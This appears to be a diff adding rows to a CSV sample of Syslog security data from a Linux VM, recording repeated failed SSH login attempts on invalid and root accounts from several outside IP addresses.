+9311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:34:13,UbuntuDevEnv,2019-06-25 22:34:13,auth,UbuntuDevEnv,info,Disconnected from invalid user avahi-autoipd 178.62.54.79 port 41334 [preauth],46713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,178.62.54.7,41334,,
+9312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:34:13,UbuntuDevEnv,2019-06-25 22:34:13,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 41334:11: Bye Bye [preauth],46713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,41334,,
+9313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:12,UbuntuDevEnv,2019-06-25 22:35:11,auth,UbuntuDevEnv,info,Invalid user admin from 139.199.113.140 port 53524,46921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,139.199.113.1,53524,,
+9314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:12,UbuntuDevEnv,2019-06-25 22:35:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:12,UbuntuDevEnv,2019-06-25 22:35:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,46921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:14,UbuntuDevEnv,2019-06-25 22:35:13,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 139.199.113.140 port 53524 ssh2,46921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,139.199.113.1,53524,,
+9317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:14,UbuntuDevEnv,2019-06-25 22:35:13,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 53524:11: Bye Bye [preauth],46921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,53524,,
+9318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:14,UbuntuDevEnv,2019-06-25 22:35:13,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 139.199.113.140 port 53524 [preauth],46921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,139.199.113.1,53524,,
+9319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:21,UbuntuDevEnv,2019-06-25 22:35:21,auth,UbuntuDevEnv,info,Invalid user admin from 152.250.252.179 port 52080,46961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,152.250.252.1,52080,,
+9320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:21,UbuntuDevEnv,2019-06-25 22:35:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,46961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:21,UbuntuDevEnv,2019-06-25 22:35:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:24,UbuntuDevEnv,2019-06-25 22:35:23,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 152.250.252.179 port 52080 ssh2,46961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,152.250.252.1,52080,,
+9323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:24,UbuntuDevEnv,2019-06-25 22:35:23,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 52080:11: Bye Bye [preauth],46961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,52080,,
+9324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:24,UbuntuDevEnv,2019-06-25 22:35:23,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 152.250.252.179 port 52080 [preauth],46961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,152.250.252.1,52080,,
+9325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:26,UbuntuDevEnv,2019-06-25 22:35:26,auth,UbuntuDevEnv,info,Invalid user web1 from 77.232.128.87 port 57124,46985,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web1,77.232.128.8,57124,,
+9326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:26,UbuntuDevEnv,2019-06-25 22:35:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,46985,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:26,UbuntuDevEnv,2019-06-25 22:35:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46985,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:28,UbuntuDevEnv,2019-06-25 22:35:28,auth,UbuntuDevEnv,info,Failed password for invalid user web1 from 77.232.128.87 port 57124 ssh2,46985,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web1,77.232.128.8,57124,,
+9329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:28,UbuntuDevEnv,2019-06-25 22:35:28,auth,UbuntuDevEnv,info,Disconnected from invalid user web1 77.232.128.87 port 57124 [preauth],46985,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web1,77.232.128.8,57124,,
+9330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:28,UbuntuDevEnv,2019-06-25 22:35:28,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 57124:11: Bye Bye [preauth],46985,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,57124,,
+9331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:34,UbuntuDevEnv,2019-06-25 22:35:34,auth,UbuntuDevEnv,info,Invalid user django from 178.62.54.79 port 57710,47018,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,django,178.62.54.7,57710,,
+9332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:34,UbuntuDevEnv,2019-06-25 22:35:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47018,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:34,UbuntuDevEnv,2019-06-25 22:35:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,47018,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:36,UbuntuDevEnv,2019-06-25 22:35:36,auth,UbuntuDevEnv,info,Failed password for invalid user django from 178.62.54.79 port 57710 ssh2,47018,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,django,178.62.54.7,57710,,
+9335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:36,UbuntuDevEnv,2019-06-25 22:35:36,auth,UbuntuDevEnv,info,Disconnected from invalid user django 178.62.54.79 port 57710 [preauth],47018,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,django,178.62.54.7,57710,,
+9336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:36,UbuntuDevEnv,2019-06-25 22:35:36,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 57710:11: Bye Bye [preauth],47018,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,57710,,
+9337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:41,UbuntuDevEnv,2019-06-25 22:35:40,auth,UbuntuDevEnv,info,Invalid user ken from 59.100.246.170 port 41766,47034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ken,59.100.246.1,41766,,
+9338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:41,UbuntuDevEnv,2019-06-25 22:35:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=59.100.246.170,47034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,59.100.246.1,,0,
+9339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:41,UbuntuDevEnv,2019-06-25 22:35:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:43,UbuntuDevEnv,2019-06-25 22:35:42,auth,UbuntuDevEnv,info,Failed password for invalid user ken from 59.100.246.170 port 41766 ssh2,47034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ken,59.100.246.1,41766,,
+9341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:43,UbuntuDevEnv,2019-06-25 22:35:43,auth,UbuntuDevEnv,info,Received disconnect from 59.100.246.170 port 41766:11: Bye Bye [preauth],47034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.100.246.1,41766,,
+9342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:35:43,UbuntuDevEnv,2019-06-25 22:35:43,auth,UbuntuDevEnv,info,Disconnected from invalid user ken 59.100.246.170 port 41766 [preauth],47034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ken,59.100.246.1,41766,,
+9343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:37,UbuntuDevEnv,2019-06-25 22:36:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:39,UbuntuDevEnv,2019-06-25 22:36:38,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 43760 ssh2,47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43760,,
+9345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:43,UbuntuDevEnv,2019-06-25 22:36:42,auth,UbuntuDevEnv,info,Invalid user test3 from 139.199.113.140 port 39698,47253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test3,139.199.113.1,39698,,
+9346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:43,UbuntuDevEnv,2019-06-25 22:36:41,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 43760 ssh2,47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43760,,
+9347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:43,UbuntuDevEnv,2019-06-25 22:36:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,47253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:43,UbuntuDevEnv,2019-06-25 22:36:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:44,UbuntuDevEnv,2019-06-25 22:36:44,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 43760 ssh2,47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43760,,
+9350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:44,UbuntuDevEnv,2019-06-25 22:36:44,auth,UbuntuDevEnv,info,Failed password for invalid user test3 from 139.199.113.140 port 39698 ssh2,47253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test3,139.199.113.1,39698,,
+9351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:45,UbuntuDevEnv,2019-06-25 22:36:44,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 39698:11: Bye Bye [preauth],47253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,39698,,
+9352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:45,UbuntuDevEnv,2019-06-25 22:36:44,auth,UbuntuDevEnv,info,Disconnected from invalid user test3 139.199.113.140 port 39698 [preauth],47253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test3,139.199.113.1,39698,,
+9353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:46,UbuntuDevEnv,2019-06-25 22:36:46,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 43760 ssh2,47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43760,,
+9354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:51,UbuntuDevEnv,2019-06-25 22:36:51,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 43760 ssh2 [preauth],47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43760,,
+9355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:51,UbuntuDevEnv,2019-06-25 22:36:51,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 43760: Too many authentication failures [preauth],47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,43760,,
+9356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:51,UbuntuDevEnv,2019-06-25 22:36:51,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:51,UbuntuDevEnv,2019-06-25 22:36:51,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:51,UbuntuDevEnv,2019-06-25 22:36:51,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 43760 ssh2],47225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43760,,
+9359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:54,UbuntuDevEnv,2019-06-25 22:36:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:55,UbuntuDevEnv,2019-06-25 22:36:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87  user=root,47310,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,77.232.128.8,,0,
+9361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:56,UbuntuDevEnv,2019-06-25 22:36:56,auth,UbuntuDevEnv,info,Invalid user doom from 178.62.54.79 port 45854,47316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doom,178.62.54.7,45854,,
+9362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:56,UbuntuDevEnv,2019-06-25 22:36:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:56,UbuntuDevEnv,2019-06-25 22:36:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,47316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:56,UbuntuDevEnv,2019-06-25 22:36:56,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 56187 ssh2,47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56187,,
+9365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:57,UbuntuDevEnv,2019-06-25 22:36:56,auth,UbuntuDevEnv,info,Failed password for root from 77.232.128.87 port 37416 ssh2,47310,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,37416,,
+9366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:57,UbuntuDevEnv,2019-06-25 22:36:56,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 37416:11: Bye Bye [preauth],47310,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,37416,,
+9367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:57,UbuntuDevEnv,2019-06-25 22:36:56,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 77.232.128.87 port 37416 [preauth],47310,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,77.232.128.8,37416,,
+9368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:58,UbuntuDevEnv,2019-06-25 22:36:57,auth,UbuntuDevEnv,info,Failed password for invalid user doom from 178.62.54.79 port 45854 ssh2,47316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doom,178.62.54.7,45854,,
+9369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:58,UbuntuDevEnv,2019-06-25 22:36:57,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 45854:11: Bye Bye [preauth],47316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,45854,,
+9370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:58,UbuntuDevEnv,2019-06-25 22:36:57,auth,UbuntuDevEnv,info,Disconnected from invalid user doom 178.62.54.79 port 45854 [preauth],47316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doom,178.62.54.7,45854,,
